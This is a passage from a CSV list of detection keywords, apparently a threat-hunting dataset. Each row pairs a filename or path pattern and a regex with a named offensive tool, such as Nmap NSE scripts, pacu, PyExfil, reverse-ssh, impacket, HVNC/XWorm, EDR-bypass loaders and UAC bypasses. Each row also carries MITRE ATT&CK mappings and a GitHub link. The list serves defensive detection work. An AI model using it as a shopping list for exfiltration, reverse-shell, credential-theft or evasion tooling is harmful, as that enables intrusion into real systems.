- TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2129.nse*",".{0,1000}\/http\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-3704.nse*",".{0,1000}\/http\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-8877.nse*",".{0,1000}\/http\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2015-1427.nse*",".{0,1000}\/http\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2015-1635.nse*",".{0,1000}\/http\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-1001000.nse*",".{0,1000}\/http\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-5638.nse*",".{0,1000}\/http\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-5689.nse*",".{0,1000}\/http\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-8917.nse*",".{0,1000}\/http\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vulners-regex.nse*",".{0,1000}\/http\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3124","534","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z" "*/http-vuln-misfortune-cookie.nse*",".{0,1000}\/http\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-wnr1000-creds.nse*",".{0,1000}\/http\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-waf-detect.nse*",".{0,1000}\/http\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-waf-fingerprint.nse*",".{0,1000}\/http\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-webdav-scan.nse*",".{0,1000}\/http\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-brute.nse*",".{0,1000}\/http\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-enum.nse*",".{0,1000}\/http\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-wordpress-users.nse*",".{0,1000}\/http\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-xssed.nse*",".{0,1000}\/http\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/huan.exe *",".{0,1000}\/huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*/HuanLoader/*",".{0,1000}\/HuanLoader\/.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*/HVNC.git*",".{0,1000}\/HVNC\.git.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*/HVNC-Server.exe*",".{0,1000}\/HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/HWSyscalls.cpp*",".{0,1000}\/HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/hXOR.exe*",".{0,1000}\/hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*/hXOR-Packer.git*",".{0,1000}\/hXOR\-Packer\.git.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*/hyperion.exe*",".{0,1000}\/hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/Hypnos.git*",".{0,1000}\/Hypnos\.git.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*/hypobrychium.git*",".{0,1000}\/hypobrychium\.git.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*/iam__backdoor_users_password*",".{0,1000}\/iam__backdoor_users_password.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iam__bruteforce_permissions/*",".{0,1000}\/iam__bruteforce_permissions\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iam__privesc_scan*",".{0,1000}\/iam__privesc_scan.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/iat_obfuscation.exe*",".{0,1000}\/iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/iax2-brute.nse*",".{0,1000}\/iax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iax2-version.nse*",".{0,1000}\/iax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/icap-info.nse*",".{0,1000}\/icap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/icebreaker.git*",".{0,1000}\/icebreaker\.git.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/icebreaker.py*",".{0,1000}\/icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/icmp_exfiltration.py*",".{0,1000}\/icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/id_reverse-ssh.pub*",".{0,1000}\/id_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/IDiagnosticProfileUAC*",".{0,1000}\/IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*/iec-identify.nse*",".{0,1000}\/iec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ielocalserver.dll*",".{0,1000}\/ielocalserver\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ieshell32.dll*",".{0,1000}\/ieshell32\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/iis_controller.py*",".{0,1000}\/iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*/IIS-Raid.git*",".{0,1000}\/IIS\-Raid\.git.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*/ike-crack.*",".{0,1000}\/ike\-crack\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/IKEForce*",".{0,1000}\/IKEForce.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","231","74","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" "*/ike-version.nse*",".{0,1000}\/ike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-brute.nse*",".{0,1000}\/imap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-capabilities.nse*",".{0,1000}\/imap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-ntlm-info.nse*",".{0,1000}\/imap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/IMDSpoof.git*",".{0,1000}\/IMDSpoof\.git.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*/imfiver/CVE-2022-0847*",".{0,1000}\/imfiver\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","270","77","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/impacket.*",".{0,1000}\/impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/impacket.zip*",".{0,1000}\/impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/impacket/*",".{0,1000}\/impacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/Impersonate.exe*",".{0,1000}\/Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.git*",".{0,1000}\/impersonate\.git.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Impersonate/Impersonate.cpp*",".{0,1000}\/Impersonate\/Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*/impersonate-rs*",".{0,1000}\/impersonate\-rs.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 